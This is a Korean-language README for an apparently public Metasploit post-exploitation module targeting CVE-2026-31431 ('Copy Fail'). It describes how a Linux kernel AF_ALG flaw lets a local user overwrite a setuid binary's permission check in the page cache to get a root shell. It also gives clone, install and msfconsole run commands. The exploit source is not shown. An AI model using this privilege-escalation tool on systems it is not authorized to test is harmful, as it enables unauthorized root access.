CVE-2026-31431("Copy Fail")용 자동화 Metasploit 포스트 익스플로잇 모듈. Linux 커널 AF_ALG 서브시스템의 결정적 논리 결함을 무기화하여, 디스크의 파일을 수정하지 않고 공유 Page Cache(RAM)에서 setuid 바이너리를 안전하게 손상시켜 root로의 로컬 권한 상승(LPE)을 달성합니다.
취약한 Linux 커널(버전 4.14~6.19.12)에서 CVE-2026-31431(일명 "Copy Fail")을 활용하여 로컬 권한 상승(LPE)을 수행하는 자동화된 Metasploit 포스트-익스플로잇 모듈입니다.
이 모듈은 Linux 커널의 암호화 하위 시스템(AF_ALG 인터페이스의 algif_aead 모듈) 내 로직 결함을 악용합니다. 부적절한 제자리 메모리 최적화로 인해 권한이 없는 로컬 사용자는 splice() 시스템 호출을 사용하여 읽기 전용 시스템 바이너리(예: /usr/bin/su 또는 /usr/bin/sudo)를 AF_ALG 소켓에 매핑하고 시스템 페이지 캐시(RAM)에서 직접 제어된 4바이트 덮어쓰기를 수행할 수 있습니다.
메모리에서 setuid 바이너리의 특정 권한 검사 명령어를 손상시켜 이 모듈은 액세스 제어를 우회하고 디스크의 실제 파일을 수정하지 않고 루트 셸을 생성합니다.
shell 및 meterpreter 세션 모두 호환register_file_for_cleanup을 사용한 자동 페이로드 정리4.14~6.19.12 지원git clone https://github.com/adityasingh108/CVE-2026-31431-Metasploit-exploit
cd CVE-2026-31431-Metasploit-exploit
Metasploit 사용자 정의 모듈은 로컬 사용자 모듈 경로 내에 배치해야 합니다:
~/.msf4/modules/
디렉터리 구조가 아직 존재하지 않는 경우 필요한 디렉터리 구조를 생성합니다:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
copy_fail.rb 파일을 다음 디렉터리에 복사합니다:
~/.msf4/modules/post/linux/escalation/
최종 구조:
~/.msf4/modules/
└── post/
└── linux/
└── escalation/
└── copy_fail.rb
Metasploit 콘솔을 시작합니다:
msfconsole
모든 모듈을 다시 로드합니다:
reload_all
익스플로잇 모듈을 로드합니다:
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
또는
exploit
msfconsole
use post/linux/escalation/copy_fail
show options
set SESSION 1
run
이 모듈은 취약한 Linux 커널을 대상으로 합니다:
4.14 <= Kernel Version <= 6.19.12
이 프로젝트는 교육 목적과 공인된 보안 연구 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 대한 무단 사용은 해당 법률 및 규정을 위반할 수 있습니다.
책임 있게 사용하십시오.